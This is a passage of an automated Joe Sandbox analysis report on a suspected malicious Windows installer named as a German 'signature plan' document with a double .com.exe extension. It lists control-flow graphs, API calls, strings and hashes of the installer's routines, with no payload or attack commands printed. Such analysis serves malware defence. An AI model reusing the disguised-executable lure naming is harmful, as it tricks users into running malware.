                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                            • API String ID: 4283519449-700603021
                                                            • Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
                                                            • Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
                                                            • Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
                                                            • Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D
                                                            Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 449 406281-40628c 450 40628e-40629d 449->450 451 40629f-4062b5 449->451 450->451 452 4062bb-4062c8 451->452 453 4064cd-4064d3 451->453 452->453 454 4062ce-4062d5 452->454 455 4064d9-4064e4 453->455 456 4062da-4062e7 453->456 454->453 458 4064e6-4064ea call 40625f 455->458 459 4064ef-4064f0 455->459 456->455 457 4062ed-4062f9 456->457 460 4064ba 457->460 461 4062ff-40633d 457->461 458->459 465 4064c8-4064cb 460->465 466 4064bc-4064c6 460->466 463 406343-40634e 461->463 464 40645d-406461 461->464 467 406350-406355 463->467 468 406367 463->468 469 406463-406469 464->469 470 406494-406498 464->470 465->453 466->453 467->468 473 406357-40635a 467->473 476 40636e-406375 468->476 474 406479-406485 call 40625f 469->474 475 40646b-406477 call 4061a6 469->475 471 4064a7-4064b8 lstrlenW 470->471 472 40649a-4064a2 call 406281 470->472 471->453 472->471 473->468 478 40635c-40635f 473->478 487 40648a-406490 474->487 475->487 480 406377-406379 476->480 481 40637a-40637c 476->481 478->468 483 406361-406365 478->483 480->481 485 4063b7-4063ba 481->485 486 40637e-40639c call 40612d 481->486 483->476 488 4063ca-4063cd 485->488 489 4063bc-4063c8 GetSystemDirectoryW 485->489 496 4063a1-4063a5 486->496 487->471 491 406492 487->491 494 406438-40643a 488->494 495 4063cf-4063dd GetWindowsDirectoryW 488->495 493 40643c-406440 489->493 492 406455-40645b call 4064f3 491->492 492->471 493->492 500 406442 493->500 494->493 497 4063df-4063e9 494->497 495->494 498 406445-406448 496->498 499 4063ab-4063b2 call 406281 496->499 505 406403-406419 SHGetSpecialFolderLocation 497->505 506 4063eb-4063ee 497->506 498->492 503 40644a-406450 lstrcatW 498->503 499->493 500->498 503->492 509 406434 505->509 510 40641b-406432 SHGetPathFromIDListW CoTaskMemFree 505->510 506->505 508 4063f0-4063f7 506->508 511 4063ff-406401 508->511 509->494 510->493 510->509 511->493 511->505
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
                                                            • SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
                                                            • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
                                                            • CoTaskMemFree.OLE32(007924D8), ref: 0040642A
                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
                                                            • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 717251189-1230650788
                                                            • Opcode ID: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
                                                            • Instruction ID: 53892de15873aface2ea8104bec8e4e448d1085f61c5dcff38edd77b46373637
                                                            • Opcode Fuzzy Hash: 890eb65aa38ad62bbc062fa9763307f13bf9a84b93246a35c735a8ee9e53aa4d
                                                            • Instruction Fuzzy Hash: AA610371A00111AADF249F64DC40ABE37A5BF55324F12813FE547B62D0DB3D89A2CB5D
                                                            Function 004052C3 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 512 4052c3-4052d8 513 4052de-4052ef 512->513 514 40538f-405393 512->514 515 4052f1-4052f5 call 406281 513->515 516 4052fa-405306 lstrlenW 513->516 515->516 518 405323-405327 516->518 519 405308-405318 lstrlenW 516->519 521 405336-40533a 518->521 522 405329-405330 SetWindowTextW 518->522 519->514 520 40531a-40531e lstrcatW 519->520 520->518 523 405380-405382 521->523 524 40533c-40537e SendMessageW * 3 521->524 522->521 523->514 525 405384-405387 523->525 524->523 525->514
                                                            APIs
                                                            • lstrlenW.KERNEL32(007A0F00,00000000,007924D8,75D523A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                                            • lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,75D523A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                                            • lstrcatW.KERNEL32(007A0F00,0040323B,0040323B,007A0F00,00000000,007924D8,75D523A0), ref: 0040531E
                                                            • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 2531174081-0
                                                            • Opcode ID: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
                                                            • Instruction ID: 54fc0906511a0d38b77c2dbc449d7618901aa97d03555d0a48212fe36839b6ac
                                                            • Opcode Fuzzy Hash: e3da8a659d26e469f7364c86854a8c7d89336f5590f3b6c2a9e79e9323d9dea2
                                                            • Instruction Fuzzy Hash: A9218C71900618BACF11AFA6DD84EDFBF74EF85350F10807AF905B22A0C7794A40CBA8
                                                            Function 004065C9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 526 4065c9-4065e9 GetSystemDirectoryW 527 4065eb 526->527 528 4065ed-4065ef 526->528 527->528 529 406600-406602 528->529 530 4065f1-4065fa 528->530 532 406603-406636 wsprintfW LoadLibraryExW 529->532 530->529 531 4065fc-4065fe 530->531 531->532
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065E0
                                                            • wsprintfW.USER32 ref: 0040661B
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040662F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925
                                                            • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                            • Instruction ID: 20a568d0c0fc1602bd6380e0cb5a56c4d8b7367864d21650c92abf75bc562668
                                                            • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                            • Instruction Fuzzy Hash: E5F0F670500219AADB14AB64ED0DF9B366CAB00304F10447AA646F11D1EBB8DA24CBA8
                                                            Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 533 4030fa-403111 534 403113 533->534 535 40311a-403123 533->535 534->535 536 403125 535->536 537 40312c-403131 535->537 536->537 538 403141-40314e call 4032f2 537->538 539 403133-40313c call 403308 537->539 543 4032e0 538->543 544 403154-403158 538->544 539->538 545 4032e2-4032e3 543->545 546 40328b-40328d 544->546 547 40315e-403184 GetTickCount 544->547 548 4032eb-4032ef 545->548 551 4032cd-4032d0 546->551 552 40328f-403292 546->552 549 4032e8 547->549 550 40318a-403192 547->550 549->548 553 403194 550->553 554 403197-4031a5 call 4032f2 550->554 555 4032d2 551->555 556 4032d5-4032de call 4032f2 551->556 552->549 557 403294 552->557 553->554 554->543 566 4031ab-4031b4 554->566 555->556 556->543 567 4032e5 556->567 560 403297-40329d 557->560 561 4032a1-4032af call 4032f2 560->561 562 40329f 560->562 561->543 570 4032b1-4032bd call 405e03 561->570 562->561 569 4031ba-4031da call 40679a 566->569 567->549 575 4031e0-4031f3 GetTickCount 569->575 576 403283-403285 569->576 577 403287-403289 570->577 578 4032bf-4032c9 570->578 579 4031f5-4031fd 575->579 580 40323e-403240 575->580 576->545 577->545 578->560 583 4032cb 578->583 584 403205-403236 MulDiv wsprintfW call 4052c3 579->584 585 4031ff-403203 579->585 581 403242-403246 580->581 582 403277-40327b 580->582 586 403248-40324f call 405e03 581->586 587 40325d-403268 581->587 582->550 588 403281 582->588 583->549 592 40323b 584->592 585->580 585->584 593 403254-403256 586->593 591 40326b-40326f 587->591 588->549 591->569 594 403275 591->594 592->580 593->577 595 403258-40325b 593->595 594->549 595->591
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CountTick$wsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 551687249-2449383134
                                                            • Opcode ID: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
                                                            • Instruction ID: 4304c27296c3acdf0d2a87061290089073c1970791b1d07264e817265a7bbb17
                                                            • Opcode Fuzzy Hash: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
                                                            • Instruction Fuzzy Hash: 3C516C31801219EBCB10DF65DA45A9F7BA8AF45766F1442BFE810B72C0C7788F51CBA9
                                                            Function 00405792 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 596 405792-4057dd CreateDirectoryW 597 4057e3-4057f0 GetLastError 596->597 598 4057df-4057e1 596->598 599 40580a-40580c 597->599 600 4057f2-405806 SetFileSecurityW 597->600 598->599 600->598 601 405808 GetLastError 600->601 601->599
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
                                                            • GetLastError.KERNEL32 ref: 004057E9
                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
                                                            • GetLastError.KERNEL32 ref: 00405808
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID: C:\Users\user\Desktop
                                                            • API String ID: 3449924974-3370423016
                                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                            • Instruction ID: 488e367ac99084f0472557c0a26963b348c4b9c4a011ef6404f7c6369f031e52
                                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                            • Instruction Fuzzy Hash: 03011A71C00619DADF009FA1C9447EFBBB4EF14354F00803AD945B6281D7789618CFE9
                                                            Function 00405D80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 602 405d80-405d8c 603 405d8d-405dc1 GetTickCount GetTempFileNameW 602->603 604 405dd0-405dd2 603->604 605 405dc3-405dc5 603->605 607 405dca-405dcd 604->607 605->603 606 405dc7 605->606 606->607
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405D9E
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C), ref: 00405DB9
                                                            Strings
                                                            • "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe", xrefs: 00405D80
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D85, 00405D89
                                                            • nsa, xrefs: 00405D8D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-3155321930
                                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                            • Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
                                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                            • Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64
                                                            Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 608 10001759-10001795 call 10001b18 612 100018a6-100018a8 608->612 613 1000179b-1000179f 608->613 614 100017a1-100017a7 call 10002286 613->614 615 100017a8-100017b5 call 100022d0 613->615 614->615 620 100017e5-100017ec 615->620 621 100017b7-100017bc 615->621 622 1000180c-10001810 620->622 623 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 620->623 624 100017d7-100017da 621->624 625 100017be-100017bf 621->625 626 10001812-1000184c call 100015b4 call 100024a4 622->626 627 1000184e-10001854 call 100024a4 622->627 648 10001855-10001859 623->648 624->620 628 100017dc-100017dd call 10002b57 624->628 630 100017c1-100017c2 625->630 631 100017c7-100017c8 call 1000289c 625->631 626->648 627->648 642 100017e2 628->642 637 100017c4-100017c5 630->637 638 100017cf-100017d5 call 10002640 630->638 639 100017cd 631->639 637->620 637->631 647 100017e4 638->647 639->642 642->647 647->620 652 10001896-1000189d 648->652 653 1000185b-10001869 call 10002467 648->653 652->612 655 1000189f-100018a0 GlobalFree 652->655 658 10001881-10001888 653->658 659 1000186b-1000186e 653->659 655->612 658->652 661 1000188a-10001895 call 1000153d 658->661 659->658 660 10001870-10001878 659->660 660->658 662 1000187a-1000187b FreeLibrary 660->662 661->652 662->658
                                                            APIs
                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                              • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                            • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                            • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                              • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                              • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                              • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                            • String ID:
                                                            • API String ID: 1791698881-3916222277
                                                            • Opcode ID: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                                            • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                            • Opcode Fuzzy Hash: 0483f3173a4470b9256ae29dd6c5e6dea881cc340ce9ef3905353ea367717f55
                                                            • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                            Function 00405C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 669 405c38-405c53 call 40625f call 405bdb 674 405c55-405c57 669->674 675 405c59-405c66 call 4064f3 669->675 676 405cb1-405cb3 674->676 679 405c76-405c7a 675->679 680 405c68-405c6e 675->680 681 405c90-405c99 lstrlenW 679->681 680->674 682 405c70-405c74 680->682 683 405c9b-405caf call 405b30 GetFileAttributesW 681->683 684 405c7c-405c83 call 4065a2 681->684 682->674 682->679 683->676 689 405c85-405c88 684->689 690 405c8a-405c8b call 405b7c 684->690 689->674 689->690 690->681
                                                            APIs
